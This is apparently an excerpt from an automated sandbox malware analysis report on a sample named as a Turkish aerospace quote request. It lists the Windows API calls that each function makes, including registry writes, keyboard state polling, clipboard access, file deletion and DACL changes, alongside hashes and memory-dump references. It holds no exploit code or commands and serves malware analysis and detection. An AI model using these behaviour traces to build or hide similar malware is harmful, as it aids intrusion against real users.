                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1803514871-438819550
                                                                                                                                    • Opcode ID: b80ebc849bd7e6774230a8eb3d589e79df4de328f4a02226f963f1b47548498e
                                                                                                                                    • Instruction ID: a7903ec25ce68b7e746fee253bc0f6d454868357a3f9fa740d5e6f6907ebbca9
                                                                                                                                    • Opcode Fuzzy Hash: b80ebc849bd7e6774230a8eb3d589e79df4de328f4a02226f963f1b47548498e
                                                                                                                                    • Instruction Fuzzy Hash: B931F43250021B6BEB31EEA5DC49EEE77FC9F452A0F14419AF984E2090DB35DA44DB50
                                                                                                                                    APIs
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01020953
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0102F910,00000000,?,00000000,?,?), ref: 010209C1
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01020A09
                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01020A92
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 01020DB2
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 01020DBF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                    • API String ID: 536824911-966354055
                                                                                                                                    • Opcode ID: f58cf519994726a94772da0eb871c8e93ccd2e8652d66b4cbd676146d37fb027
                                                                                                                                    • Instruction ID: 0e341d9e5c0d9f79f080165de07775785d241d70eff21a732e4ae3e4d6849533
                                                                                                                                    • Opcode Fuzzy Hash: f58cf519994726a94772da0eb871c8e93ccd2e8652d66b4cbd676146d37fb027
                                                                                                                                    • Instruction Fuzzy Hash: 770259756046119FDB54EF18C881E2AB7E5FF8A314F04846DF98A9B362CB78ED01DB81
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0100F113
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100F128
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100F13F
                                                                                                                                      • Part of subcall function 01004385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010043A0
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0100F16E
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100F179
                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0100F195
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100F1BC
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100F1D3
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0100F1E5
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(01058920), ref: 0100F203
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100F20D
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100F21A
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100F22C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1824444939-438819550
                                                                                                                                    • Opcode ID: e0b9251d9f21f244c75fed19720a8574cedd44898b61f5f71d77ac7f219a1c35
                                                                                                                                    • Instruction ID: 7b7b9736f43d731fca2f758f3501b8a941cc16de2233ef878a82ae24404b9cc1
                                                                                                                                    • Opcode Fuzzy Hash: e0b9251d9f21f244c75fed19720a8574cedd44898b61f5f71d77ac7f219a1c35
                                                                                                                                    • Instruction Fuzzy Hash: 9731483650021B7BEB32EEA8EC49EDE77BC9F462A0F144199E980E20D0DB35DA44DB54
                                                                                                                                    APIs
                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0100A20F
                                                                                                                                    • __swprintf.LIBCMT ref: 0100A231
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0100A26E
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0100A293
                                                                                                                                    • _memset.LIBCMT ref: 0100A2B2
                                                                                                                                    • _wcsncpy.LIBCMT ref: 0100A2EE
                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0100A323
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0100A32E
                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0100A337
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0100A341
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                                    • Opcode ID: bd371c39ec16f3082b3b2e8187dcc58826f531a071f37454338fa6020e241760
                                                                                                                                    • Instruction ID: a460a54c674edf53c5b236379cd806aa9e01ea84f83c734dd5732a822f50802e
                                                                                                                                    • Opcode Fuzzy Hash: bd371c39ec16f3082b3b2e8187dcc58826f531a071f37454338fa6020e241760
                                                                                                                                    • Instruction Fuzzy Hash: B831C37160020AABEB31DFA4DC49FEB37BCEF89740F1041B6FA49D2190EB7592448B24
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FF8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FF821E
                                                                                                                                      • Part of subcall function 00FF8202: GetLastError.KERNEL32(?,00FF7CE2,?,?,?), ref: 00FF8228
                                                                                                                                      • Part of subcall function 00FF8202: GetProcessHeap.KERNEL32(00000008,?,?,00FF7CE2,?,?,?), ref: 00FF8237
                                                                                                                                      • Part of subcall function 00FF8202: HeapAlloc.KERNEL32(00000000,?,00FF7CE2,?,?,?), ref: 00FF823E
                                                                                                                                      • Part of subcall function 00FF8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FF8255
                                                                                                                                      • Part of subcall function 00FF829F: GetProcessHeap.KERNEL32(00000008,00FF7CF8,00000000,00000000,?,00FF7CF8,?), ref: 00FF82AB
                                                                                                                                      • Part of subcall function 00FF829F: HeapAlloc.KERNEL32(00000000,?,00FF7CF8,?), ref: 00FF82B2
                                                                                                                                      • Part of subcall function 00FF829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FF7CF8,?), ref: 00FF82C3
                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FF7D13
                                                                                                                                    • _memset.LIBCMT ref: 00FF7D28
                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FF7D47
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FF7D58
                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00FF7D95
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FF7DB1
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FF7DCE
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FF7DDD
                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00FF7DE4
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FF7E05
                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00FF7E0C
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FF7E3D
                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FF7E63
                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FF7E77
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3996160137-0
                                                                                                                                    • Opcode ID: 50a047ec84e28b4e85e25dc986db6943bc918944afb45f9e2b4415b08e0bde73
                                                                                                                                    • Instruction ID: e9045246318ae1338ff3d92b9ca423175f03e772de8ace82c5bcbbcd2d0e7f5a
                                                                                                                                    • Opcode Fuzzy Hash: 50a047ec84e28b4e85e25dc986db6943bc918944afb45f9e2b4415b08e0bde73
                                                                                                                                    • Instruction Fuzzy Hash: A6615C7190020AAFDF209FA0DC85EBEFB79FF04750F14815AFA15A6290DB399A05DB60
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                    • API String ID: 0-4052911093
                                                                                                                                    • Opcode ID: aa3c1376444f65c066839e952ec9ca4e0f394484d103e2930eeb6f3b775765b0
                                                                                                                                    • Instruction ID: e3e9a64ca60cba25b6267887289849cc1f2cc6d6f501cae8058147f86573a48c
                                                                                                                                    • Opcode Fuzzy Hash: aa3c1376444f65c066839e952ec9ca4e0f394484d103e2930eeb6f3b775765b0
                                                                                                                                    • Instruction Fuzzy Hash: A2724DB5E00219DBDB24CF59C8807FEB7B5BF44720F24816AE949EB290DB349941EF90
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 01000097
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 01000102
                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 01000122
                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 01000139
                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 01000168
                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 01000179
                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 010001A5
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 010001B3
                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 010001DC
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 010001EA
                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 01000213
                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 01000221
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                    • Opcode ID: d6be4d8be4fb27b002b83c80ae8b1999ee5dbdefaafed7b5d50eaab9ab44a1eb
                                                                                                                                    • Instruction ID: cfdbd3c827603eb776450619f179da07343ff48784ec00488a3b590b1397e314
                                                                                                                                    • Opcode Fuzzy Hash: d6be4d8be4fb27b002b83c80ae8b1999ee5dbdefaafed7b5d50eaab9ab44a1eb
                                                                                                                                    • Instruction Fuzzy Hash: 9351F83090478929FB77DBA888147EABFF49F022C0F0845DEE6C6565C7DAA4978CC761
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010204AC
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0102054B
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010205E3
                                                                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01020822
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0102082F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1240663315-0
                                                                                                                                    • Opcode ID: 557af4a508ecb0d238ea7ec507a6879cf99e396d4f238e21379c0d7f3e5f9099
                                                                                                                                    • Instruction ID: b1c91c5d906a95acdbc0a2d98e614de29387b64d8dd273b76aa7ffe5f0220598
                                                                                                                                    • Opcode Fuzzy Hash: 557af4a508ecb0d238ea7ec507a6879cf99e396d4f238e21379c0d7f3e5f9099
                                                                                                                                    • Instruction Fuzzy Hash: 46E17B70604314AFCB14DF28C885E6BBBE4FF89714F04896DF88ADB265DA34E905CB91
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                    • Opcode ID: 0b4310cc4825c38a39b80cd52ae253495fbc51edcbc06ef9320cf37af7b9c6c2
                                                                                                                                    • Instruction ID: ea8c77509d30e780a68f56b836da90868b32d9bc4cdbc6a25b3655d383724202
                                                                                                                                    • Opcode Fuzzy Hash: 0b4310cc4825c38a39b80cd52ae253495fbc51edcbc06ef9320cf37af7b9c6c2
                                                                                                                                    • Instruction Fuzzy Hash: 632180753002119FDB31AF64DC09B6D7BA8EF06750F14801AF986DB265DB7DA800CB54
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                                                                                      • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 010038A3
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0100394B
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0100395E
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0100397B
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100399D
                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 010039B9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 4002782344-1173974218
                                                                                                                                    • Opcode ID: 67ddf9d8e18b467618a76196a07405ea6ca357344cca0717a92ca07040b3af0e
                                                                                                                                    • Instruction ID: de19aeda0325bf6101876369d64fa02f1fca59fa3dd1b79d35b17fce6afbe11e
                                                                                                                                    • Opcode Fuzzy Hash: 67ddf9d8e18b467618a76196a07405ea6ca357344cca0717a92ca07040b3af0e
                                                                                                                                    • Instruction Fuzzy Hash: 94519F7180414D9EDF17FBA4DE92DEEB7B9AF16300F6000A9E441BA191EB256F0DDB60
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0100F440
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0100F470
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100F484
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100F49F
                                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 0100F53D
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100F553
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 713712311-438819550
                                                                                                                                    • Opcode ID: 2dafe8cc2a5f3b6c0ea4c4577722de3f91e57f63eb5998ecd5591b7693930b26
                                                                                                                                    • Instruction ID: 2bf4f24f8752b662f9ad23c676ca7daa1ca69581538781f8d56fa87e32a001ae
                                                                                                                                    • Opcode Fuzzy Hash: 2dafe8cc2a5f3b6c0ea4c4577722de3f91e57f63eb5998ecd5591b7693930b26
                                                                                                                                    • Instruction Fuzzy Hash: 6941E07180020BAFEF61EF68CC49AEEBBB4FF05350F14409AE985A3191DB359A84DF50
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                    • Opcode ID: b0acd107f6e7ec8a371f67bb0eabfec4a86eb229b230b52d4edc0af57f5fd151
                                                                                                                                    • Instruction ID: 8405206fad9e270e12bf72914d91ed2ac0722557f94aadbda43088234a9cc45f
                                                                                                                                    • Opcode Fuzzy Hash: b0acd107f6e7ec8a371f67bb0eabfec4a86eb229b230b52d4edc0af57f5fd151
                                                                                                                                    • Instruction Fuzzy Hash: 5F129B70A0060ADFDF14DFA5C981AEEB7F5FF48310F104529E846E7251EB3AA915EB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                                                                                      • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 01003B89
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 01003BD9
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 01003BEA
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 01003C01
